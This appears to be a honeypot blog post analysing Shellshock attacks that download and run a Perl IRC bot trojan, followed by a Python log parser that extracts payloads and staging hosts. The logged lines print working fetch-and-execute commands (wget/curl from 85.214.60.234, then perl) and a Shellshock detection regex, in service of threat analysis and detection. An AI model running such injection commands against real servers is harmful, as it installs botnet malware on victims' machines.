Sunday, 14 June 2015

Perl script injection: 85.214.60.234/den

Over the last two days several shell injections have hit my honeypot. Each of them carried the Shellshock-style "() { :;};" function-definition prefix in its HTTP headers and tried to download a Perl script and execute it:

Jun 13 06:42:11 beeswarm [mypyfwa] 2015-06-13 06:42:11.531828 74.208.167.71 - - [12/Jun/2015:20:25:25 +0200] "GET / HTTP/1.1" 404 442 "() { :;}; cd /var/spool/samba/;wget 85.214.60.234/den;perl den;rm -fr den;curl -sO 85.214.60.234/den;perl den;rm -fr den*\"" "() { :;}; cd /var/spool/samba/;wget 85.214.60.234/den;perl den;rm -fr den;curl -sO 85.214.60.234/den;perl den;rm -fr den*\"" 74.208.167.71 US SHELLinjection
I downloaded the file manually; it is a Perl IRC bot.

 /XFupload.py -f den
{"malware":{"type":"md5","md5":"0x7AE21F4543FE5F842A7BB9F79D95A88E","origins":{"external":{"detectionCoverage":35,"family":["trojan"]}}}}
and
clamscan den
den: Trojan.IRCBot-1142 FOUND
The sources of the attack are
  • 223.252.35.159 (AU)
  • 74.208.167.71 (US)
Both hosts appear to be hosted servers (1&1 and Ozservers).
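The beeswarm line above shows everything a triage script needs: the Shellshock trigger "() { :;};" in the Referer and User-Agent fields, the injected command string, the staging host the stager is fetched from, and the source address at the front of the line. The following is an added example (not part of the original post or of beeswarm) that pulls those fields out of such log lines; the first sample line is the one logged above, the other two are constructed for the example, with 198.51.100.7 (a documentation address) standing in for a staging host and 223.252.35.159 used as the source only because the post lists it.

```python
"""Extract Shellshock-style payloads and their download stagers from
honeypot web logs.  Added example; sample lines 2 and 3 are constructed."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# The Shellshock (CVE-2014-6271) trigger: a bash function definition in an
# HTTP header value, followed by the commands the attacker wants executed.
# The command string ends at the closing quote of the logged header.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{\s*:;\s*\};\s*(?P<cmds>[^"]*)')

# Dotted IPv4 literal; the first one on a beeswarm line is the source address.
IPV4_RE = re.compile(r'\b(?:\d{1,3}\.){3}\d{1,3}\b')

# A wget/curl fetch inside the command string.  The target must be a dotted
# hostname or IP (optionally with http(s)://) so that option flags such as
# "-sO" and bare filenames such as "den" are not mistaken for the target.
FETCH_RE = re.compile(
    r'\b(?:wget|curl)\b[^;]*?\s'
    r'(?P<url>(?:https?://)?(?P<host>[A-Za-z0-9][\w-]*(?:\.[\w-]+)+)'
    r'(?P<path>/[^\s;"\'\\]*)?)'
)

# Line 1: the honeypot line from the post.  Lines 2 and 3: constructed.
SAMPLE_LINES = [
    r'Jun 13 06:42:11 beeswarm [mypyfwa] 2015-06-13 06:42:11.531828 74.208.167.71 - - [12/Jun/2015:20:25:25 +0200] "GET / HTTP/1.1" 404 442 "() { :;}; cd /var/spool/samba/;wget 85.214.60.234/den;perl den;rm -fr den;curl -sO 85.214.60.234/den;perl den;rm -fr den*\"" "() { :;}; cd /var/spool/samba/;wget 85.214.60.234/den;perl den;rm -fr den;curl -sO 85.214.60.234/den;perl den;rm -fr den*\"" 74.208.167.71 US SHELLinjection',
    # constructed benign request: must be ignored
    r'Jun 13 07:01:02 beeswarm [mypyfwa] 2015-06-13 07:01:02.000000 198.51.100.9 - - [13/Jun/2015:07:01:02 +0200] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0" 198.51.100.9 XX',
    # constructed variant: payload only in User-Agent, curl with a full URL
    r'Jun 13 09:15:30 beeswarm [mypyfwa] 2015-06-13 09:15:30.000000 223.252.35.159 - - [13/Jun/2015:09:15:30 +0200] "GET / HTTP/1.1" 404 442 "-" "() { :;}; /usr/bin/curl -s http://198.51.100.7/den -o /tmp/den;perl /tmp/den" 223.252.35.159 AU SHELLinjection',
]


@dataclass
class ShellshockHit:
    source_ip: Optional[str]
    commands: List[str] = field(default_factory=list)
    stager_urls: List[str] = field(default_factory=list)
    stager_hosts: List[str] = field(default_factory=list)


def parse_hit(line: str) -> Optional[ShellshockHit]:
    """Return the parsed payload of one log line, or None if it is not Shellshock."""
    m = SHELLSHOCK_RE.search(line)  # same payload sits in Referer and UA; first copy suffices
    if not m:
        return None
    src = IPV4_RE.search(line)
    # The logger escapes the attacker's closing quote as \" ; drop the stray backslash.
    cmds = m.group("cmds").rstrip("\\")
    hit = ShellshockHit(source_ip=src.group(0) if src else None)
    hit.commands = [c.strip() for c in cmds.split(";") if c.strip()]
    for f in FETCH_RE.finditer(cmds):
        if f.group("url") not in hit.stager_urls:
            hit.stager_urls.append(f.group("url"))
        if f.group("host") not in hit.stager_hosts:
            hit.stager_hosts.append(f.group("host"))
    return hit


def parse_hits(lines) -> List[ShellshockHit]:
    """Parse a whole log, keeping only the Shellshock lines."""
    return [h for h in (parse_hit(l) for l in lines) if h is not None]


if __name__ == "__main__":
    for hit in parse_hits(SAMPLE_LINES):
        print(hit.source_ip, "->", hit.stager_hosts, hit.commands)
```

The staging hosts collected this way (85.214.60.234 in the logged case) are the indicator worth blocking or pivoting on, since the source addresses are rented servers that change from wave to wave.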

The Perl script identifies itself as "Jericho Security Team Perl Bot v3.0".
Strangely, the IRC server address within the script is set to
place.youredomainhere.net
which looks like an unchanged template placeholder.

Stranger still, that domain resolves to an address in a Schlund (1&1 Internet AG) range:

inetnum:        87.106.0.0 - 87.106.15.255
netname:        SCHLUND-CUSTOMERS
descr:          1&1 Internet AG
country:        DE